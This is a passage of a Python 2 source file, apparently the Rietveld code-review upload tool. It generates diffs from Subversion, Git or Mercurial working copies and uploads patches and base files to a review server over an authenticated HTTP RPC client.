def Send(self, request_path, payload=None,
content_type="application/octet-stream",
timeout=None,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
if not self.authenticated:
self._Authenticate()
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "http://%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
try:
f = self.opener.open(req)
response = f.read()
f.close()
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401 or e.code == 302:
self._Authenticate()
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
class HttpRpcServer(AbstractRpcServer):
"""Provides a simplified RPC-style interface for HTTP requests."""
def _Authenticate(self):
"""Save the cookie jar after authentication."""
super(HttpRpcServer, self)._Authenticate()
if self.save_cookies:
StatusUpdate("Saving authentication cookies to %s" % self.cookie_file)
self.cookie_jar.save()
def _GetOpener(self):
"""Returns an OpenerDirector that supports cookies and ignores redirects.
Returns:
A urllib2.OpenerDirector object.
"""
opener = urllib2.OpenerDirector()
opener.add_handler(urllib2.ProxyHandler())
opener.add_handler(urllib2.UnknownHandler())
opener.add_handler(urllib2.HTTPHandler())
opener.add_handler(urllib2.HTTPDefaultErrorHandler())
opener.add_handler(urllib2.HTTPSHandler())
opener.add_handler(urllib2.HTTPErrorProcessor())
if self.save_cookies:
self.cookie_file = os.path.expanduser("~/.codereview_upload_cookies_" + server)
self.cookie_jar = cookielib.MozillaCookieJar(self.cookie_file)
if os.path.exists(self.cookie_file):
try:
self.cookie_jar.load()
self.authenticated = True
StatusUpdate("Loaded authentication cookies from %s" %
self.cookie_file)
except (cookielib.LoadError, IOError):
# Failed to load cookies - just ignore them.
pass
else:
# Create an empty cookie file with mode 600
fd = os.open(self.cookie_file, os.O_CREAT, 0600)
os.close(fd)
# Always chmod the cookie file
os.chmod(self.cookie_file, 0600)
else:
# Don't save cookies across runs of update.py.
self.cookie_jar = cookielib.CookieJar()
opener.add_handler(urllib2.HTTPCookieProcessor(self.cookie_jar))
return opener
parser = optparse.OptionParser(usage="%prog [options] [-- diff_options]")
parser.add_option("-y", "--assume_yes", action="store_true",
dest="assume_yes", default=False,
help="Assume that the answer to yes/no questions is 'yes'.")
# Logging
group = parser.add_option_group("Logging options")
group.add_option("-q", "--quiet", action="store_const", const=0,
dest="verbose", help="Print errors only.")
group.add_option("-v", "--verbose", action="store_const", const=2,
dest="verbose", default=1,
help="Print info level logs (default).")
group.add_option("--noisy", action="store_const", const=3,
dest="verbose", help="Print all logs.")
# Review server
group = parser.add_option_group("Review server options")
group.add_option("-s", "--server", action="store", dest="server",
default="codereview.appspot.com",
metavar="SERVER",
help=("The server to upload to. The format is host[:port]. "
"Defaults to '%default'."))
group.add_option("-e", "--email", action="store", dest="email",
metavar="EMAIL", default=None,
help="The username to use. Will prompt if omitted.")
group.add_option("-H", "--host", action="store", dest="host",
metavar="HOST", default=None,
help="Overrides the Host header sent with all RPCs.")
group.add_option("--no_cookies", action="store_false",
dest="save_cookies", default=True,
help="Do not save authentication cookies to local disk.")
# Issue
group = parser.add_option_group("Issue options")
group.add_option("-d", "--description", action="store", dest="description",
metavar="DESCRIPTION", default=None,
help="Optional description when creating an issue.")
group.add_option("-f", "--description_file", action="store",
dest="description_file", metavar="DESCRIPTION_FILE",
default=None,
help="Optional path of a file that contains "
"the description when creating an issue.")
group.add_option("-r", "--reviewers", action="store", dest="reviewers",
metavar="REVIEWERS", default=None,
help="Add reviewers (comma separated email addresses).")
group.add_option("--cc", action="store", dest="cc",
metavar="CC", default=None,
help="Add CC (comma separated email addresses).")
group.add_option("--private", action="store_true", dest="private",
default=False,
help="Make the issue restricted to reviewers and those CCed")
# Upload options
group = parser.add_option_group("Patch options")
group.add_option("-m", "--message", action="store", dest="message",
metavar="MESSAGE", default=None,
help="A message to identify the patch. "
"Will prompt if omitted.")
group.add_option("-i", "--issue", type="int", action="store",
metavar="ISSUE", default=None,
help="Issue number to which to add. Defaults to new issue.")
group.add_option("--download_base", action="store_true",
dest="download_base", default=False,
help="Base files will be downloaded by the server "
"(side-by-side diffs may not work on files with CRs).")
group.add_option("--rev", action="store", dest="revision",
metavar="REV", default=None,
help="Branch/tree/revision to diff against (used by DVCS).")
group.add_option("--send_mail", action="store_true",
dest="send_mail", default=False,
help="Send notification email to reviewers.")
group.add_option("--vcs", action="store", dest="vcs",
metavar="VCS", default=None,
help=("Version control system (optional, usually upload.py "
"already guesses the right VCS)."))
def GetRpcServer(options):
"""Returns an instance of an AbstractRpcServer.
Returns:
A new AbstractRpcServer, on which RPC calls can be made.
"""
rpc_server_class = HttpRpcServer
def GetUserCredentials():
"""Prompts the user for a username and password."""
email = options.email
if email is None:
email = GetEmail("Email (login for uploading to %s)" % options.server)
password = getpass.getpass("Password for %s: " % email)
return (email, password)
# If this is the dev_appserver, use fake authentication.
host = (options.host or options.server).lower()
if host == "localhost" or host.startswith("localhost:"):
email = options.email
if email is None:
email = "test@example.com"
logging.info("Using debug user %s. Override with --email" % email)
server = rpc_server_class(
options.server,
lambda: (email, "password"),
host_override=options.host,
extra_headers={"Cookie":
'dev_appserver_login="%s:False"' % email},
save_cookies=options.save_cookies)
# Don't try to talk to ClientLogin.
server.authenticated = True
return server
return rpc_server_class(options.server, GetUserCredentials,
host_override=options.host,
save_cookies=options.save_cookies)
def EncodeMultipartFormData(fields, files):
"""Encode form fields for multipart/form-data.
Args:
fields: A sequence of (name, value) elements for regular form fields.
files: A sequence of (name, filename, value) elements for data to be
uploaded as files.
Returns:
(content_type, body) ready for httplib.HTTP instance.
Source:
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
"""
BOUNDARY = '-M-A-G-I-C---B-O-U-N-D-A-R-Y-'
CRLF = '\r\n'
lines = []
for (key, value) in fields:
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"' % key)
lines.append('')
if type(value) == unicode:
value = value.encode("utf-8")
lines.append(value)
for (key, filename, value) in files:
if type(filename) == unicode:
filename = filename.encode("utf-8")
if type(value) == unicode:
value = value.encode("utf-8")
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename))
lines.append('Content-Type: %s' % GetContentType(filename))
lines.append('')
lines.append(value)
lines.append('--' + BOUNDARY + '--')
lines.append('')
body = CRLF.join(lines)
content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
return content_type, body
def GetContentType(filename):
"""Helper to guess the content-type from the filename."""
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
# Use a shell for subcommands on Windows to get a PATH search.
use_shell = sys.platform.startswith("win")
def RunShellWithReturnCode(command, print_output=False,
universal_newlines=True,
env=os.environ):
"""Executes a command and returns the output from stdout and the return code.
Args:
command: Command to execute.
print_output: If True, the output is printed to stdout.
If False, both stdout and stderr are ignored.
universal_newlines: Use universal_newlines flag (default: True).
Returns:
Tuple (output, return code)
"""
logging.info("Running %s", command)
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=use_shell, universal_newlines=universal_newlines,
env=env)
if print_output:
output_array = []
while True:
line = p.stdout.readline()
if not line:
break
print line.strip("\n")
output_array.append(line)
output = "".join(output_array)
else:
output = p.stdout.read()
p.wait()
errout = p.stderr.read()
if print_output and errout:
print >>sys.stderr, errout
p.stdout.close()
p.stderr.close()
return output, p.returncode
def RunShell(command, silent_ok=False, universal_newlines=True,
print_output=False, env=os.environ):
data, retcode = RunShellWithReturnCode(command, print_output,
universal_newlines, env)
if retcode:
ErrorExit("Got error status from %s:\n%s" % (command, data))
if not silent_ok and not data:
ErrorExit("No output from %s" % command)
return data
class VersionControlSystem(object):
"""Abstract base class providing an interface to the VCS."""
def __init__(self, options):
"""Constructor.
Args:
options: Command line options.
"""
self.options = options
def GenerateDiff(self, args):
"""Return the current diff as a string.
Args:
args: Extra arguments to pass to the diff command.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def CheckForUnknownFiles(self):
"""Show an "are you sure?" prompt if there are unknown files."""
unknown_files = self.GetUnknownFiles()
if unknown_files:
print "The following files are not added to version control:"
for line in unknown_files:
print line
prompt = "Are you sure to continue?(y/N) "
answer = raw_input(prompt).strip()
if answer != "y":
ErrorExit("User aborted")
def GetBaseFile(self, filename):
"""Get the content of the upstream version of a file.
Returns:
A tuple (base_content, new_content, is_binary, status)
base_content: The contents of the base file.
new_content: For text files, this is empty. For binary files, this is
the contents of the new file, since the diff output won't contain
information to reconstruct the current file.
is_binary: True iff the file is binary.
status: The status of the file.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetBaseFiles(self, diff):
"""Helper that calls GetBase file for each file in the patch.
Returns:
A dictionary that maps from filename to GetBaseFile's tuple. Filenames
are retrieved based on lines that start with "Index:" or
"Property changes on:".
"""
files = {}
for line in diff.splitlines(True):
if line.startswith('Index:') or line.startswith('Property changes on:'):
unused, filename = line.split(':', 1)
# On Windows if a file has property changes its filename uses '\'
# instead of '/'.
filename = filename.strip().replace('\\', '/')
files[filename] = self.GetBaseFile(filename)
return files
def UploadBaseFiles(self, issue, rpc_server, patch_list, patchset, options,
files):
"""Uploads the base files (and if necessary, the current ones as well)."""
def UploadFile(filename, file_id, content, is_binary, status, is_base):
"""Uploads a file to the server."""
file_too_large = False
if is_base:
type = "base"
else:
type = "current"
if len(content) > MAX_UPLOAD_SIZE:
print ("Not uploading the %s file for %s because it's too large." %
(type, filename))
file_too_large = True
content = ""
checksum = md5(content).hexdigest()
if options.verbose > 0 and not file_too_large:
print "Uploading %s file for %s" % (type, filename)
url = "/%d/upload_content/%d/%d" % (int(issue), int(patchset), file_id)
form_fields = [("filename", filename),
("status", status),
("checksum", checksum),
("is_binary", str(is_binary)),
("is_current", str(not is_base)),
]
if file_too_large:
form_fields.append(("file_too_large", "1"))
if options.email:
form_fields.append(("user", options.email))
ctype, body = EncodeMultipartFormData(form_fields,
[("data", filename, content)])
response_body = rpc_server.Send(url, body,
content_type=ctype)
if not response_body.startswith("OK"):
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
patches = dict()
[patches.setdefault(v, k) for k, v in patch_list]
for filename in patches.keys():
base_content, new_content, is_binary, status = files[filename]
file_id_str = patches.get(filename)
if file_id_str.find("nobase") != -1:
base_content = None
file_id_str = file_id_str[file_id_str.rfind("_") + 1:]
file_id = int(file_id_str)
if base_content != None:
UploadFile(filename, file_id, base_content, is_binary, status, True)
if new_content != None:
UploadFile(filename, file_id, new_content, is_binary, status, False)
def IsImage(self, filename):
"""Returns true if the filename has an image extension."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False
return mimetype.startswith("image/")
def IsBinary(self, filename):
"""Returns true if the guessed mimetyped isnt't in text group."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False # e.g. README, "real" binaries usually have an extension
# special case for text files which don't start with text/
if mimetype in TEXT_MIMETYPES:
return False
return not mimetype.startswith("text/")
class SubversionVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Subversion."""
def __init__(self, options):
super(SubversionVCS, self).__init__(options)
if self.options.revision:
match = re.match(r"(\d+)(:(\d+))?", self.options.revision)
if not match:
ErrorExit("Invalid Subversion revision %s." % self.options.revision)
self.rev_start = match.group(1)
self.rev_end = match.group(3)
else:
self.rev_start = self.rev_end = None
# Cache output from "svn list -r REVNO dirname".
# Keys: dirname, Values: 2-tuple (ouput for start rev and end rev).
self.svnls_cache = {}
# SVN base URL is required to fetch files deleted in an older revision.
# Result is cached to not guess it over and over again in GetBaseFile().
required = self.options.download_base or self.options.revision is not None
self.svn_base = self._GuessBase(required)
def GuessBase(self, required):
"""Wrapper for _GuessBase."""
return self.svn_base
def _GuessBase(self, required):
"""Returns the SVN base URL.
Args:
required: If true, exits if the url can't be guessed, otherwise None is
returned.
"""
info = RunShell(["svn", "info"])
for line in info.splitlines():
words = line.split()
if len(words) == 2 and words[0] == "URL:":
url = words[1]
scheme, netloc, path, params, query, fragment = urlparse.urlparse(url)
username, netloc = urllib.splituser(netloc)
if username:
logging.info("Removed username from base URL")
if netloc.endswith("svn.python.org"):
if netloc == "svn.python.org":
if path.startswith("/projects/"):
path = path[9:]
elif netloc != "pythondev@svn.python.org":
ErrorExit("Unrecognized Python URL: %s" % url)
base = "http://svn.python.org/view/*checkout*%s/" % path
logging.info("Guessed Python base = %s", base)
elif netloc.endswith("svn.collab.net"):
if path.startswith("/repos/"):
path = path[6:]
base = "http://svn.collab.net/viewvc/*checkout*%s/" % path
logging.info("Guessed CollabNet base = %s", base)
elif netloc.endswith(".googlecode.com"):
path = path + "/"
base = urlparse.urlunparse(("http", netloc, path, params,
query, fragment))
logging.info("Guessed Google Code base = %s", base)
else:
path = path + "/"
base = urlparse.urlunparse((scheme, netloc, path, params,
query, fragment))
logging.info("Guessed base = %s", base)
return base
if required:
ErrorExit("Can't find URL in output from svn info")
return None
def GenerateDiff(self, args):
cmd = ["svn", "diff"]
if self.options.revision:
cmd += ["-r", self.options.revision]
cmd.extend(args)
data = RunShell(cmd)
count = 0
for line in data.splitlines():
if line.startswith("Index:") or line.startswith("Property changes on:"):
count += 1
logging.info(line)
if not count:
ErrorExit("No valid patches found in output from svn diff")
return data
def _CollapseKeywords(self, content, keyword_str):
"""Collapses SVN keywords."""
# svn cat translates keywords but svn diff doesn't. As a result of this
# behavior patching.PatchChunks() fails with a chunk mismatch error.
# This part was originally written by the Review Board development team
# who had the same problem (http://reviews.review-board.org/r/276/).
# Mapping of keywords to known aliases
svn_keywords = {
# Standard keywords
'Date': ['Date', 'LastChangedDate'],
'Revision': ['Revision', 'LastChangedRevision', 'Rev'],
'Author': ['Author', 'LastChangedBy'],
'HeadURL': ['HeadURL', 'URL'],
'Id': ['Id'],
# Aliases
'LastChangedDate': ['LastChangedDate', 'Date'],
'LastChangedRevision': ['LastChangedRevision', 'Rev', 'Revision'],
'LastChangedBy': ['LastChangedBy', 'Author'],
'URL': ['URL', 'HeadURL'],
}
def repl(m):
if m.group(2):
return "$%s::%s$" % (m.group(1), " " * len(m.group(3)))
return "$%s$" % m.group(1)
keywords = [keyword
for name in keyword_str.split(" ")
for keyword in svn_keywords.get(name, [])]
return re.sub(r"\$(%s):(:?)([^\$]+)\$" % '|'.join(keywords), repl, content)
def GetUnknownFiles(self):
status = RunShell(["svn", "status", "--ignore-externals"], silent_ok=True)
unknown_files = []
for line in status.split("\n"):
if line and line[0] == "?":
unknown_files.append(line)
return unknown_files
def ReadFile(self, filename):
"""Returns the contents of a file."""
file = open(filename, 'rb')
result = ""
try:
result = file.read()
finally:
file.close()
return result
def GetStatus(self, filename):
"""Returns the status of a file."""
if not self.options.revision:
status = RunShell(["svn", "status", "--ignore-externals", filename])
if not status:
ErrorExit("svn status returned no output for %s" % filename)
status_lines = status.splitlines()
# If file is in a cl, the output will begin with
# "\n--- Changelist 'cl_name':\n". See
# http://svn.collab.net/repos/svn/trunk/notes/changelist-design.txt
if (len(status_lines) == 3 and
not status_lines[0] and
status_lines[1].startswith("--- Changelist")):
status = status_lines[2]
else:
status = status_lines[0]
# If we have a revision to diff against we need to run "svn list"
# for the old and the new revision and compare the results to get
# the correct status for a file.
else:
dirname, relfilename = os.path.split(filename)
if dirname not in self.svnls_cache:
cmd = ["svn", "list", "-r", self.rev_start, dirname or "."]
out, returncode = RunShellWithReturnCode(cmd)
if returncode:
ErrorExit("Failed to get status for %s." % filename)
old_files = out.splitlines()
args = ["svn", "list"]
if self.rev_end:
args += ["-r", self.rev_end]
cmd = args + [dirname or "."]
out, returncode = RunShellWithReturnCode(cmd)
if returncode:
ErrorExit("Failed to run command %s" % cmd)
self.svnls_cache[dirname] = (old_files, out.splitlines())
old_files, new_files = self.svnls_cache[dirname]
if relfilename in old_files and relfilename not in new_files:
status = "D "
elif relfilename in old_files and relfilename in new_files:
status = "M "
else:
status = "A "
return status
def GetBaseFile(self, filename):
status = self.GetStatus(filename)
base_content = None
new_content = None
# If a file is copied its status will be "A +", which signifies
# "addition-with-history". See "svn st" for more information. We need to
# upload the original file or else diff parsing will fail if the file was
# edited.
if status[0] == "A" and status[3] != "+":
# We'll need to upload the new content if we're adding a binary file
# since diff's output won't contain it.
mimetype = RunShell(["svn", "propget", "svn:mime-type", filename],
silent_ok=True)
base_content = ""
is_binary = bool(mimetype) and not mimetype.startswith("text/")
if is_binary and self.IsImage(filename):
new_content = self.ReadFile(filename)
elif (status[0] in ("M", "D", "R") or
(status[0] == "A" and status[3] == "+") or # Copied file.
(status[0] == " " and status[1] == "M")): # Property change.
args = []
if self.options.revision:
url = "%s/%s@%s" % (self.svn_base, filename, self.rev_start)
else:
# Don't change filename, it's needed later.
url = filename
args += ["-r", "BASE"]
cmd = ["svn"] + args + ["propget", "svn:mime-type", url]
mimetype, returncode = RunShellWithReturnCode(cmd)
if returncode:
# File does not exist in the requested revision.
# Reset mimetype, it contains an error message.
mimetype = ""
get_base = False
is_binary = bool(mimetype) and not mimetype.startswith("text/")
if status[0] == " ":
# Empty base content just to force an upload.
base_content = ""
elif is_binary:
if self.IsImage(filename):
get_base = True
if status[0] == "M":
if not self.rev_end:
new_content = self.ReadFile(filename)
else:
url = "%s/%s@%s" % (self.svn_base, filename, self.rev_end)
new_content = RunShell(["svn", "cat", url],
universal_newlines=True, silent_ok=True)
else:
base_content = ""
else:
get_base = True
if get_base:
if is_binary:
universal_newlines = False
else:
universal_newlines = True
if self.rev_start:
# "svn cat -r REV delete_file.txt" doesn't work. cat requires
# the full URL with "@REV" appended instead of using "-r" option.
url = "%s/%s@%s" % (self.svn_base, filename, self.rev_start)
base_content = RunShell(["svn", "cat", url],
universal_newlines=universal_newlines,
silent_ok=True)
else:
base_content = RunShell(["svn", "cat", filename],
universal_newlines=universal_newlines,
silent_ok=True)
if not is_binary:
args = []
if self.rev_start:
url = "%s/%s@%s" % (self.svn_base, filename, self.rev_start)
else:
url = filename
args += ["-r", "BASE"]
cmd = ["svn"] + args + ["propget", "svn:keywords", url]
keywords, returncode = RunShellWithReturnCode(cmd)
if keywords and not returncode:
base_content = self._CollapseKeywords(base_content, keywords)
else:
StatusUpdate("svn status returned unexpected output: %s" % status)
sys.exit(1)
return base_content, new_content, is_binary, status[0:5]
class GitVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Git."""
def __init__(self, options):
super(GitVCS, self).__init__(options)
# Map of filename -> (hash before, hash after) of base file.
# Hashes for "no such file" are represented as None.
self.hashes = {}
# Map of new filename -> old filename for renames.
self.renames = {}
def GenerateDiff(self, extra_args):
# This is more complicated than svn's GenerateDiff because we must convert
# the diff output to include an svn-style "Index:" line as well as record
# the hashes of the files, so we can upload them along with our diff.
# Special used by git to indicate "no such content".
NULL_HASH = "0"*40
extra_args = extra_args[:]
if self.options.revision:
extra_args = [self.options.revision] + extra_args
extra_args.append('-M')
# --no-ext-diff is broken in some versions of Git, so try to work around
# this by overriding the environment (but there is still a problem if the
# git config key "diff.external" is used).
env = os.environ.copy()
if 'GIT_EXTERNAL_DIFF' in env: del env['GIT_EXTERNAL_DIFF']
gitdiff = RunShell(["git", "diff", "--no-ext-diff", "--full-index"]
+ extra_args, env=env)
svndiff = []
filecount = 0
filename = None
for line in gitdiff.splitlines():
match = re.match(r"diff --git a/(.*) b/(.*)$", line)
if match:
filecount += 1
# Intentionally use the "after" filename so we can show renames.
filename = match.group(2)
svndiff.append("Index: %s\n" % filename)
if match.group(1) != match.group(2):
self.renames[match.group(2)] = match.group(1)
else:
# The "index" line in a git diff looks like this (long hashes elided):
# index 82c0d44..b2cee3f 100755
# We want to save the left hash, as that identifies the base file.
match = re.match(r"index (\w+)\.\.(\w+)", line)
if match:
before, after = (match.group(1), match.group(2))
if before == NULL_HASH:
before = None
if after == NULL_HASH:
after = None
self.hashes[filename] = (before, after)
svndiff.append(line + "\n")
if not filecount:
ErrorExit("No valid patches found in output from git diff")
return "".join(svndiff)
def GetUnknownFiles(self):
status = RunShell(["git", "ls-files", "--exclude-standard", "--others"],
silent_ok=True)
return status.splitlines()
def GetFileContent(self, file_hash, is_binary):
"""Returns the content of a file identified by its git hash."""
data, retcode = RunShellWithReturnCode(["git", "show", file_hash],
universal_newlines=not is_binary)
if retcode:
ErrorExit("Got error status from 'git show %s'" % file_hash)
return data
def GetBaseFile(self, filename):
hash_before, hash_after = self.hashes.get(filename, (None,None))
base_content = None
new_content = None
is_binary = self.IsBinary(filename)
status = None
if filename in self.renames:
status = "A +" # Match svn attribute name for renames.
if filename not in self.hashes:
# If a rename doesn't change the content, we never get a hash.
base_content = RunShell(["git", "show", filename])
elif not hash_before:
status = "A"
base_content = ""
elif not hash_after:
status = "D"
else:
status = "M"
is_image = self.IsImage(filename)
# Grab the before/after content if we need it.
# We should include file contents if it's text or it's an image.
if not is_binary or is_image:
# Grab the base content if we don't have it already.
if base_content is None and hash_before:
base_content = self.GetFileContent(hash_before, is_binary)
# Only include the "after" file if it's an image; otherwise it
# it is reconstructed from the diff.
if is_image and hash_after:
new_content = self.GetFileContent(hash_after, is_binary)
return (base_content, new_content, is_binary, status)
class MercurialVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Mercurial."""
def __init__(self, options, repo_dir):
super(MercurialVCS, self).__init__(options)
# Absolute path to repository (we can be in a subdir)
self.repo_dir = os.path.normpath(repo_dir)
# Compute the subdir
cwd = os.path.normpath(os.getcwd())
assert cwd.startswith(self.repo_dir)
self.subdir = cwd[len(self.repo_dir):].lstrip(r"\/")
if self.options.revision:
self.base_rev = self.options.revision
else:
self.base_rev = RunShell(["hg", "parent", "-q"]).split(':')[1].strip()
def _GetRelPath(self, filename):
"""Get relative path of a file according to the current directory,
given its logical path in the repo."""
assert filename.startswith(self.subdir), (filename, self.subdir)
return filename[len(self.subdir):].lstrip(r"\/")
def GenerateDiff(self, extra_args):
# If no file specified, restrict to the current subdir
extra_args = extra_args or ["."]
cmd = ["hg", "diff", "--git", "-r", self.base_rev] + extra_args
data = RunShell(cmd, silent_ok=True)
svndiff = []
filecount = 0
for line in data.splitlines():
m = re.match("diff --git a/(\S+) b/(\S+)", line)
if m:
# Modify line to make it look like as it comes from svn diff.
# With this modification no changes on the server side are required
# to make upload.py work with Mercurial repos.
# NOTE: for proper handling of moved/copied files, we have to use
# the second filename.
filename = m.group(2)
svndiff.append("Index: %s" % filename)
svndiff.append("=" * 67)
filecount += 1
logging.info(line)
else:
svndiff.append(line)
if not filecount:
ErrorExit("No valid patches found in output from hg diff")
return "\n".join(svndiff) + "\n"
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
args = []
status = RunShell(["hg", "status", "--rev", self.base_rev, "-u", "."],
silent_ok=True)
unknown_files = []
for line in status.splitlines():
st, fn = line.split(" ", 1)
if st == "?":
unknown_files.append(fn)
return unknown_files
def GetBaseFile(self, filename):
# "hg status" and "hg cat" both take a path relative to the current subdir
# rather than to the repo root, but "hg diff" has given us the full path
# to the repo root.
base_content = ""
new_content = None
is_binary = False
oldrelpath = relpath = self._GetRelPath(filename)
# "hg status -C" returns two lines for moved/copied files, one otherwise
out = RunShell(["hg", "status", "-C", "--rev", self.base_rev, relpath])
out = out.splitlines()
# HACK: strip error message about missing file/directory if it isn't in
# the working copy
if out[0].startswith('%s: ' % relpath):
out = out[1:]
if len(out) > 1:
# Moved/copied => considered as modified, use old filename to
# retrieve base contents
oldrelpath = out[1].strip()
status = "M"
else:
status, _ = out[0].split(' ', 1)
if ":" in self.base_rev:
base_rev = self.base_rev.split(":", 1)[0]
else:
base_rev = self.base_rev
if status != "A":
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
silent_ok=True)
is_binary = "\0" in base_content # Mercurial's heuristic
if status != "R":
new_content = open(relpath, "rb").read()
is_binary = is_binary or "\0" in new_content
if is_binary and base_content:
# Fetch again without converting newlines
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
silent_ok=True, universal_newlines=False)
if not is_binary or not self.IsImage(relpath):
new_content = None
return base_content, new_content, is_binary, status
# NOTE: The SplitPatch function is duplicated in engine.py, keep them in sync.
def SplitPatch(data):
"""Splits a patch into separate pieces for each file.
Args:
data: A string containing the output of svn diff.
Returns:
A list of 2-tuple (filename, text) where text is the svn diff output
pertaining to filename.
"""
patches = []
filename = None
diff = []
for line in data.splitlines(True):
new_filename = None
if line.startswith('Index:'):
unused, new_filename = line.split(':', 1)
new_filename = new_filename.strip()
elif line.startswith('Property changes on:'):
unused, temp_filename = line.split(':', 1)
# When a file is modified, paths use '/' between directories, however
# when a property is modified '\' is used on Windows. Make them the same
# otherwise the file shows up twice.
temp_filename = temp_filename.strip().replace('\\', '/')
if temp_filename != filename:
# File has property changes but no modifications, create a new diff.
new_filename = temp_filename
if new_filename:
if filename and diff:
patches.append((filename, ''.join(diff)))
filename = new_filename
diff = [line]
continue
if diff is not None:
diff.append(line)
if filename and diff:
patches.append((filename, ''.join(diff)))
return patches
def UploadSeparatePatches(issue, rpc_server, patchset, data, options):
"""Uploads a separate patch for each file in the diff output.
Returns a list of [patch_key, filename] for each file.
"""
patches = SplitPatch(data)
rv = []
for patch in patches:
if len(patch[1]) > MAX_UPLOAD_SIZE:
print ("Not uploading the patch for " + patch[0] +
" because the file is too large.")
continue
form_fields = [("filename", patch[0])]
if not options.download_base:
form_fields.append(("content_upload", "1"))
files = [("data", "data.diff", patch[1])]
ctype, body = EncodeMultipartFormData(form_fields, files)
url = "/%d/upload_patch/%d" % (int(issue), int(patchset))
print "Uploading patch for " + patch[0]
response_body = rpc_server.Send(url, body, content_type=ctype)
lines = response_body.splitlines()
if not lines or lines[0] != "OK":
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
rv.append([lines[1], patch[0]])
return rv
def GuessVCSName():
"""Helper to guess the version control system.
This examines the current directory, guesses which VersionControlSystem
we're using, and returns an string indicating which VCS is detected.
Returns:
A pair (vcs, output). vcs is a string indicating which VCS was detected
and is one of VCS_GIT, VCS_MERCURIAL, VCS_SUBVERSION, or VCS_UNKNOWN.
output is a string containing any interesting output from the vcs
detection routine, or None if there is nothing interesting.
"""
# Mercurial has a command to get the base directory of a repository
# Try running it, but don't die if we don't have hg installed.
# NOTE: we try Mercurial first as it can sit on top of an SVN working copy.
try:
out, returncode = RunShellWithReturnCode(["hg", "root"])
if returncode == 0:
return (VCS_MERCURIAL, out.strip())
except OSError, (errno, message):
if errno != 2: # ENOENT -- they don't have hg installed.
raise
# Subversion has a .svn in all working directories.
if os.path.isdir('.svn'):
logging.info("Guessed VCS = Subversion")
return (VCS_SUBVERSION, None)
# Git has a command to test if you're in a git tree.
# Try running it, but don't die if we don't have git installed.
try:
out, returncode = RunShellWithReturnCode(["git", "rev-parse",
"--is-inside-work-tree"])
if returncode == 0:
return (VCS_GIT, None)
except OSError, (errno, message):
if errno != 2: # ENOENT -- they don't have git installed.
raise
return (VCS_UNKNOWN, None)
def GuessVCS(options):
"""Helper to guess the version control system.
This verifies any user-specified VersionControlSystem (by command line
or environment variable). If the user didn't specify one, this examines
the current directory, guesses which VersionControlSystem we're using,
and returns an instance of the appropriate class. Exit with an error
if we can't figure it out.
Returns:
A VersionControlSystem instance. Exits if the VCS can't be guessed.
"""
vcs = options.vcs
if not vcs:
vcs = os.environ.get("CODEREVIEW_VCS")
if vcs:
v = VCS_ABBREVIATIONS.get(vcs.lower())
if v is None:
ErrorExit("Unknown version control system %r specified." % vcs)
(vcs, extra_output) = (v, None)
else:
(vcs, extra_output) = GuessVCSName()
if vcs == VCS_MERCURIAL:
if extra_output is None:
extra_output = RunShell(["hg", "root"]).strip()
return MercurialVCS(options, extra_output)
elif vcs == VCS_SUBVERSION:
return SubversionVCS(options)
elif vcs == VCS_GIT:
return GitVCS(options)
ErrorExit(("Could not guess version control system. "
"Are you in a working copy directory?"))
def RealMain(argv, data=None):
"""The real main function.
Args:
argv: Command line arguments.
data: Diff contents. If None (default) the diff is generated by
the VersionControlSystem implementation returned by GuessVCS().
Returns:
A 2-tuple (issue id, patchset id).
The patchset id is None if the base files are not uploaded by this
script (applies only to SVN checkouts).
"""
logging.basicConfig(format=("%(asctime).19s %(levelname)s %(filename)s:"
"%(lineno)s %(message)s "))
os.environ['LC_ALL'] = 'C'
options, args = parser.parse_args(argv[1:])
global verbosity
verbosity = options.verbose
if verbosity >= 3:
logging.getLogger().setLevel(logging.DEBUG)
elif verbosity >= 2:
logging.getLogger().setLevel(logging.INFO)
vcs = GuessVCS(options)
if isinstance(vcs, SubversionVCS):
# base field is only allowed for Subversion.
# Note: Fetching base files may become deprecated in future releases.
base = vcs.GuessBase(options.download_base)
else:
base = None
if not base and options.download_base:
options.download_base = True
logging.info("Enabled upload of base file")
if not options.assume_yes:
vcs.CheckForUnknownFiles()
if data is None:
data = vcs.GenerateDiff(args)
files = vcs.GetBaseFiles(data)
if verbosity >= 1:
print "Upload server:", options.server, "(change with -s/--server)"
if options.issue:
prompt = "Message describing this patch set: "
else:
prompt = "New issue subject: "
message = options.message or raw_input(prompt).strip()
if not message:
ErrorExit("A non-empty message is required")
rpc_server = GetRpcServer(options)
form_fields = [("subject", message)]
if base:
